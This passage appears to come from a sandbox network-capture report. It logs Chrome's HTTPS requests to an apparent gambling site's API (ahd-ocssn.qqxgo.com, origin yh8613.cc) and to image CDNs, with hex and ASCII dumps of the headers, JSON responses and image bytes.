                                                                                                                                                          2024-06-09 22:41:19 UTC425INData Raw: 31 61 32 0d 0a 68 6f 6c 64 22 3a 30 2c 22 77 65 63 68 61 74 41 75 74 6f 4c 6f 67 69 6e 22 3a 31 2c 22 74 72 61 6e 66 65 72 54 6f 43 68 69 6c 64 46 6c 61 67 22 3a 30 2c 22 75 73 65 72 4d 6f 62 69 6c 65 45 64 69 74 46 6c 61 67 22 3a 30 2c 22 77 65 63 68 61 74 50 61 79 53 6f 72 74 22 3a 22 32 22 2c 22 76 69 70 43 68 61 72 67 65 54 61 67 46 6c 61 67 22 3a 30 2c 22 63 61 70 74 63 68 61 54 79 70 65 22 3a 22 6e 6f 72 6d 61 6c 22 2c 22 74 72 61 6e 73 66 65 72 43 68 61 72 67 65 46 6c 61 67 22 3a 31 2c 22 74 68 69 72 64 70 61 72 74 79 54 72 61 6e 73 66 65 72 49 6e 54 68 72 65 73 68 6f 6c 64 22 3a 30 2c 22 61 6c 69 70 61 79 43 68 61 72 67 65 46 6c 61 67 22 3a 31 2c 22 66 61 73 74 50 61 79 54 61 67 22 3a 32 2c 22 75 73 65 72 41 63 63 6f 75 6e 74 4c 65 6e 67 68 74 4d
                                                                                                                                                          Data Ascii: 1a2hold":0,"wechatAutoLogin":1,"tranferToChildFlag":0,"userMobileEditFlag":0,"wechatPaySort":"2","vipChargeTagFlag":0,"captchaType":"normal","transferChargeFlag":1,"thirdpartyTransferInThreshold":0,"alipayChargeFlag":1,"fastPayTag":2,"userAccountLenghtM
                                                                                                                                                          2024-06-09 22:41:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          502192.168.2.550282170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC660OUTPOST /mt-cloud/api/sn.maintain HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 325
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC325OUTData Raw: 6a 73 6f 6e 3d 25 37 42 25 32 32 69 64 25 32 32 25 33 41 25 32 32 31 37 39 37 32 38 37 36 32 37 30 38 31 37 25 32 32 25 32 43 25 32 32 6a 73 6f 6e 72 70 63 25 32 32 25 33 41 25 32 32 32 2e 30 25 32 32 25 32 43 25 32 32 6d 65 74 68 6f 64 25 32 32 25 33 41 25 32 32 73 6e 2e 6d 61 69 6e 74 61 69 6e 25 32 32 25 32 43 25 32 32 70 61 72 61 6d 73 25 32 32 25 33 41 25 37 42 25 32 32 73 6e 25 32 32 25 33 41 25 32 32 75 79 30 39 25 32 32 25 32 43 25 32 32 6d 6f 64 75 6c 65 49 64 25 32 32 25 33 41 25 32 32 25 32 32 25 32 43 25 32 32 74 65 72 6d 69 6e 61 6c 25 32 32 25 33 41 31 25 32 43 25 32 32 68 6f 73 74 25 32 32 25 33 41 25 32 32 79 68 38 36 31 33 2e 63 63 25 32 32 25 32 43 25 32 32 66 69 6e 67 65 72 4f 53 4d 6f 64 65 6c 25 32 32 25 33 41 25 32 32 43 68 72 6f 6d
                                                                                                                                                          Data Ascii: json=%7B%22id%22%3A%2217972876270817%22%2C%22jsonrpc%22%3A%222.0%22%2C%22method%22%3A%22sn.maintain%22%2C%22params%22%3A%7B%22sn%22%3A%22uy09%22%2C%22moduleId%22%3A%22%22%2C%22terminal%22%3A1%2C%22host%22%3A%22yh8613.cc%22%2C%22fingerOSModel%22%3A%22Chrom
                                                                                                                                                          2024-06-09 22:41:19 UTC571INHTTP/1.1 200
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:19 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: aliyungf_tc=31a135f1451fc02434f1c77c57844f66ef0d1e97cdce47af0d27754258e2cf00; Path=/; HttpOnly
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Origin
                                                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          api-elapsed: 0
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:19 UTC196INData Raw: 62 65 0d 0a 7b 22 69 64 22 3a 22 31 37 39 37 32 38 37 36 32 37 30 38 31 37 22 2c 22 72 65 73 75 6c 74 22 3a 7b 22 65 6e 74 72 79 43 61 63 68 65 54 69 6d 65 22 3a 6e 75 6c 6c 2c 22 66 6c 61 67 22 3a 30 2c 22 6e 6f 77 22 3a 6e 75 6c 6c 2c 22 73 74 61 72 74 54 69 6d 65 22 3a 6e 75 6c 6c 2c 22 65 6e 64 54 69 6d 65 22 3a 6e 75 6c 6c 2c 22 6d 6f 64 75 6c 65 49 64 22 3a 6e 75 6c 6c 2c 22 6d 74 43 61 63 68 65 45 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 75 73 65 72 4d 65 6d 6f 22 3a 6e 75 6c 6c 7d 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 7d 0a 0d 0a
                                                                                                                                                          Data Ascii: be{"id":"17972876270817","result":{"entryCacheTime":null,"flag":0,"now":null,"startTime":null,"endTime":null,"moduleId":null,"mtCacheError":null,"userMemo":null},"error":null,"jsonrpc":"2.0"}
                                                                                                                                                          2024-06-09 22:41:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          503192.168.2.550281170.33.9.2274434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC665OUTPOST /mt-cloud/api/sn.maintain.list HTTP/1.1
                                                                                                                                                          Host: ahd-ocssn.qqxgo.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 304
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://yh8613.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC304OUTData Raw: 6a 73 6f 6e 3d 25 37 42 25 32 32 69 64 25 32 32 25 33 41 25 32 32 31 37 39 37 32 38 37 36 33 32 32 36 34 33 25 32 32 25 32 43 25 32 32 6a 73 6f 6e 72 70 63 25 32 32 25 33 41 25 32 32 32 2e 30 25 32 32 25 32 43 25 32 32 6d 65 74 68 6f 64 25 32 32 25 33 41 25 32 32 73 6e 2e 6d 61 69 6e 74 61 69 6e 2e 6c 69 73 74 25 32 32 25 32 43 25 32 32 70 61 72 61 6d 73 25 32 32 25 33 41 25 37 42 25 32 32 73 6e 25 32 32 25 33 41 25 32 32 75 79 30 39 25 32 32 25 32 43 25 32 32 74 65 72 6d 69 6e 61 6c 25 32 32 25 33 41 31 25 32 43 25 32 32 68 6f 73 74 25 32 32 25 33 41 25 32 32 79 68 38 36 31 33 2e 63 63 25 32 32 25 32 43 25 32 32 66 69 6e 67 65 72 4f 53 4d 6f 64 65 6c 25 32 32 25 33 41 25 32 32 43 68 72 6f 6d 65 25 32 30 31 31 37 2e 30 2e 30 2e 30 25 32 30 25 37 43 25 32
                                                                                                                                                          Data Ascii: json=%7B%22id%22%3A%2217972876322643%22%2C%22jsonrpc%22%3A%222.0%22%2C%22method%22%3A%22sn.maintain.list%22%2C%22params%22%3A%7B%22sn%22%3A%22uy09%22%2C%22terminal%22%3A1%2C%22host%22%3A%22yh8613.cc%22%2C%22fingerOSModel%22%3A%22Chrome%20117.0.0.0%20%7C%2
                                                                                                                                                          2024-06-09 22:41:18 UTC571INHTTP/1.1 200
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Set-Cookie: aliyungf_tc=f9675bcaebadecda6a43b405a842b9d979431af1ee512a7d702cb3489f7ab6bd; Path=/; HttpOnly
                                                                                                                                                          Server: Tengine/2.3.0
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Vary: Origin
                                                                                                                                                          Vary: Access-Control-Request-Method
                                                                                                                                                          Vary: Access-Control-Request-Headers
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          api-elapsed: 1
                                                                                                                                                          x-server: AkamaiNetStorage(jp15)
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          2024-06-09 22:41:18 UTC1517INData Raw: 35 65 36 0d 0a 7b 22 69 64 22 3a 22 31 37 39 37 32 38 37 36 33 32 32 36 34 33 22 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 65 6e 74 72 79 43 61 63 68 65 54 69 6d 65 22 3a 22 32 30 32 34 2d 30 36 2d 31 30 20 30 36 3a 34 30 3a 33 36 22 2c 22 66 6c 61 67 22 3a 31 2c 22 6e 6f 77 22 3a 6e 75 6c 6c 2c 22 73 74 61 72 74 54 69 6d 65 22 3a 22 32 30 32 34 2d 30 33 2d 31 31 20 31 34 3a 33 30 3a 30 30 22 2c 22 65 6e 64 54 69 6d 65 22 3a 22 32 30 32 34 2d 30 37 2d 30 31 20 30 30 3a 30 30 3a 30 30 22 2c 22 6d 6f 64 75 6c 65 49 64 22 3a 34 30 34 2c 22 75 73 65 72 4d 65 6d 6f 22 3a 22 5b e6 98 93 e8 83 9c e5 8d 9a e4 bd 93 e8 82 b2 5d e7 bb b4 e6 8a a4 e6 97 b6 e7 a8 8b e9 80 9a e7 9f a5 22 2c 22 6d 74 43 61 63 68 65 45 72 72 6f 72 22 3a 6e 75 6c 6c 7d 2c 7b 22 65 6e 74 72
                                                                                                                                                          Data Ascii: 5e6{"id":"17972876322643","result":[{"entryCacheTime":"2024-06-10 06:40:36","flag":1,"now":null,"startTime":"2024-03-11 14:30:00","endTime":"2024-07-01 00:00:00","moduleId":404,"userMemo":"[]","mtCacheError":null},{"entr
                                                                                                                                                          2024-06-09 22:41:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: 0


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          504192.168.2.55028423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC647OUTGET /pc/image-pc/index/382/top/icon_f_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:18 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 475
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:17 GMT
                                                                                                                                                          ETag: "64c0a20d-1db"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE21[4],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473792
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 38446589dcaeee744ece12413b9bba0f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118208
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:18 UTC475INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 13 00 00 00 12 08 06 00 00 00 b9 0c e5 69 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 01 8d 49 44 41 54 38 8d 8d d4 3d 8c 0e 41 1c c7 f1 cf b3 2e 5e 3b 25 f7 28 50 49 50 20 51 88 48 36 28 84 88 97 84 42 14 2a 92 2b 14 5c fc 5b c9 b8 28 bc 24 ae 51 88 86 c4 29 d0 5b 91 d3 50 a8 b4 c4 c5 25 1e 91 08 c5 25 a2 10 8a 7d 9c f5 64 9e 67 fd aa 9d 99 ef 7c 67 f6 bf b3 d3 91 49 4a 69 17 4e 60 3f d6 a3 c0 37 bc c4 63 dc 8b 88 85 c1 79 9d 01 c9 1a dc c6 81 dc 22 8d 7c c6 44 44 cc 34 3b 97 34 44 9b 30 8b 6d 2d 22 58 85 e3 65 59 76 aa aa 7a fe 8f 2c a5 b4 1a 2f d0 fd 0f 51 33 7b ca b2 ec 55 55 f5 9a ba 16 70 0d eb 32 f0 27 5c c1 79 4c e3 47 86 b9 9e 52 1a 87 22 a5 d4 c5 a9 0c f4 01 9b f1
                                                                                                                                                          Data Ascii: PNGIHDRipHYsIDAT8=A.^;%(PIP QH6(B*+\[($Q)[P%%}dg|gIJiN`?7cy"|DD4;4D0m-"XeYvz,/Q3{UUp2'\yLGR"


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          505192.168.2.55027654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC641OUTGET /pc/image-pc/video/bbin_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC329INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-3444"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13380
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 13112522199892126724
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC13380INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          506192.168.2.55027854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC639OUTGET /pc/image-pc/video/pt_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC329INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-3501"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 13569
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 11114211583591260798
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC13569INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          507192.168.2.55027754.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC639OUTGET /pc/image-pc/video/dg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:18 UTC328INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-4cb2"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 19634
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 6335558473673290863
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:19 UTC16384INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:19 UTC3250INData Raw: 0d 24 48 4a 5c e2 57 f6 f5 7d c5 d6 5c ae 23 2f c6 17 98 72 2e 45 67 90 c6 e2 b0 d6 23 20 97 93 47 34 08 ad 14 d7 31 4c 96 d0 43 25 4a ab 98 c9 5f e6 49 2c b0 a2 27 b8 cd e4 55 90 65 7d 2a a4 12 4e 99 67 c0 4b 51 23 94 f9 00 ac 49 90 6c e6 94 ca b2 ea 66 04 00 35 4f 2e 26 7a 40 3d 5c c9 2a 00 9e 8b c8 f8 e7 10 c4 fc 71 37 12 b8 e1 37 38 27 7c ec f2 41 c8 32 d8 1e 4f 67 88 49 ee a1 8e 18 9f 7b 5f 4b 22 96 21 63 47 66 91 77 a8 0d 06 c6 33 ea 95 0a f5 6a 57 f1 05 40 7b a0 48 35 32 d8 1f ba 3a ce 58 7c d3 ee c5 ca f4 69 53 a3 a0 a1 07 51 33 2b 50 2e 5f 78 f5 0c f1 f9 65 de 81 eb 1e 27 83 b7 e1 d7 f2 60 73 0f 7b 87 c0 5d cb 92 e4 bc 76 de ce 6b f9 e6 cb c6 92 c7 63 6c cd 7d 60 d6 8d 69 67 1a bd c4 c4 fb 82 8d 2e e5 3f cb 22 ed c5 66 f1 a4 cb 22 c2 4a 49 00 05
                                                                                                                                                          Data Ascii: $HJ\W}\#/r.Eg# G41LC%J_I,'Ue}*NgKQ#Ilf5O.&z@=\*q778'|A2OgI{_K"!cGfw3jW@{H52:X|iSQ3+P._xe'`s{]vkcl}`ig.?"f"JI


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          508192.168.2.55027954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:18 UTC625OUTGET /fiximg/ac-20200404/fileupload/uy09/202108/202108190259527.png HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/plain, */*
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://yh8613.cc
                                                                                                                                                          Sec-Fetch-Site: cross-site
